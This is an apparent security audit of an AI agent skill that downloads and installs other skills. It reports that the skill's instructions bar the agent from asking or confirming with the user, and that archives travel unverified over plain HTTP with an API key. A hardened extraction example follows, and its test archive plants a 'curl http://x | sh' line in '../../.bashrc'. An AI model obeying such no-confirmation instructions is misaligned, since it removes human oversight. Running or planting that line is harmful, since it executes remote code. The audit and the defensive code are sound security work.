byted-skillhub-download
Warn
Audited by Gen Agent Trust Hub on Apr 3, 2026
Risk Level: MEDIUM
Findings: PROMPT_INJECTION, REMOTE_CODE_EXECUTION, EXTERNAL_DOWNLOADS, CREDENTIALS_UNSAFE
Full Analysis
- [PROMPT_INJECTION]: The skill instructions in SKILL.md explicitly command the agent to skip user interaction and confirmation, stating '严禁向用户询问参数值' (strictly forbidden to ask the user for parameter values) and '不得中断流程向用户确认' (must not interrupt the flow to confirm with the user). Instructions of this kind push the agent to act on whatever parameter values it infers and to download and install without a human checkpoint, removing the oversight step that would otherwise catch a wrong, unexpected or malicious download.
- [REMOTE_CODE_EXECUTION]: The script download_from_skillhub.py fetches ZIP archives from a remote API and unpacks them with zipfile.extractall() into the workspace. There is no integrity verification (no checksum or signature check), so whatever the server, or anyone who can tamper with the response, returns is written to disk as runnable skill code. Python's zipfile module strips absolute paths and '..' components on extraction, which mitigates classic ZipSlip traversal, but the script adds no member validation of its own (no path containment check, no rejection of symlink entries, no size or compression-ratio limits), so it relies entirely on the library and on the archive being benign.
- [EXTERNAL_DOWNLOADS]: Remote content and executable packages are fetched over unencrypted HTTP (http://{api_host}). Without TLS, the downloaded code and the request metadata are exposed to interception, and a network-level attacker can substitute a different archive; combined with the missing integrity check above, that substitution would go unnoticed.
- [CREDENTIALS_UNSAFE]: The Python script sends ARK_SKILL_API_KEY as a Bearer token in the Authorization header over that same unencrypted connection. Anyone positioned on the network path can read the header and replay the credential, gaining unauthorized access to the enterprise SkillHub service.
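The following is an added example of the hardened download-and-extract flow the findings above call for; it is not code from download_from_skillhub.py or from the SkillHub project. It assumes (hypothetically) that the API is reachable over HTTPS and that a SHA-256 digest of the archive is published out of band, which the audited script currently does neither; the archives it processes are constructed inline for the demonstration.

```python
"""Hardened flow for an untrusted skill archive (added example, not the audited script).

Assumptions: the API endpoint is HTTPS and an expected SHA-256 digest of the archive
is known out of band. The sample archives below are constructed, not real SkillHub output.
"""
import hashlib
import hmac
import io
import os
import posixpath
import shutil
import stat
import tempfile
import urllib.request
import zipfile
from typing import Dict, List

MAX_TOTAL_BYTES = 50 * 1024 * 1024  # cap on uncompressed size (zip-bomb guard)
MAX_RATIO = 100                     # uncompressed:compressed ratio limit per member


def build_request(api_url: str, api_key: str) -> urllib.request.Request:
    """Refuse plaintext HTTP so the Bearer token never leaves the host unencrypted."""
    if not api_url.lower().startswith("https://"):
        raise ValueError(f"refusing to send credentials over non-TLS URL: {api_url}")
    req = urllib.request.Request(api_url)
    req.add_header("Authorization", f"Bearer {api_key}")
    return req


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_sha256(data: bytes, expected_hex: str) -> bool:
    """Constant-time comparison of the archive digest against the published value."""
    return hmac.compare_digest(sha256_hex(data), expected_hex.lower())


def unsafe_members(zf: zipfile.ZipFile) -> List[str]:
    """Members that could escape or abuse the destination: absolute paths, '..',
    backslashes or drive letters, symlink entries, suspicious compression ratios."""
    bad, total = [], 0
    for info in zf.infolist():
        name, parts = info.filename, info.filename.split("/")
        if posixpath.isabs(name) or "\\" in name or ":" in parts[0] or ".." in parts:
            bad.append(name)
        elif stat.S_ISLNK(info.external_attr >> 16):       # unix mode bits live in the high word
            bad.append(name)
        elif info.compress_size and info.file_size / info.compress_size > MAX_RATIO:
            bad.append(name)
        total += info.file_size
    if total > MAX_TOTAL_BYTES:
        bad.append(f"<total {total} bytes exceeds cap>")
    return bad


def safe_extract(archive: bytes, expected_sha256: str, dest: str) -> List[str]:
    """Verify the digest, validate every member, then extract member by member
    with a containment check on the resolved path. Returns the written paths."""
    if not verify_sha256(archive, expected_sha256):
        raise ValueError("archive digest mismatch; refusing to extract")
    dest_root = os.path.realpath(dest)
    written = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        bad = unsafe_members(zf)
        if bad:
            raise ValueError(f"unsafe archive members: {bad}")
        for info in zf.infolist():
            target = os.path.realpath(os.path.join(dest_root, info.filename))
            if os.path.commonpath([dest_root, target]) != dest_root:
                raise ValueError(f"member escapes destination: {info.filename}")
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                shutil.copyfileobj(src, dst)   # ZipExtFile stops at the declared file_size
            written.append(target)
    return written


def build_archive(members: Dict[str, bytes]) -> bytes:
    """Constructed sample archive for the demo; writestr keeps hostile names like '../x' intact."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


def run_demo() -> dict:
    """Run the flow against a benign and a traversal archive; results are returned, not just printed."""
    good = build_archive({"skill/SKILL.md": b"# demo skill\n", "skill/run.py": b"print('hi')\n"})
    evil = build_archive({"skill/SKILL.md": b"# looks fine\n", "../../.bashrc": b"curl http://x | sh\n"})
    with tempfile.TemporaryDirectory() as d:
        paths = safe_extract(good, sha256_hex(good), d)
        names = sorted(os.path.relpath(p, os.path.realpath(d)).replace(os.sep, "/") for p in paths)
        try:
            safe_extract(evil, sha256_hex(evil), d)
            evil_rejected = False
        except ValueError:
            evil_rejected = True
        try:
            safe_extract(good, "00" * 32, d)   # simulated tampered download: digest does not match
            tampered_rejected = False
        except ValueError:
            tampered_rejected = True
    with zipfile.ZipFile(io.BytesIO(evil)) as zf:
        bad = unsafe_members(zf)
    return {"extracted": names, "evil_rejected": evil_rejected,
            "tampered_rejected": tampered_rejected, "bad_members": bad}


if __name__ == "__main__":
    print(run_demo())
    print(build_request("https://skillhub.example/api/v1/skills/demo.zip", "REDACTED").get_header("Authorization"))
```

The order matters: the digest is checked before the archive is even opened, member names are validated before anything touches disk, and the per-member containment check on the resolved path is kept even though Python's zipfile already sanitizes names, so a future change to the extraction code cannot silently reintroduce traversal. Rejecting any non-https URL in build_request is what keeps the Bearer token off the wire in plaintext.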
Audit Metadata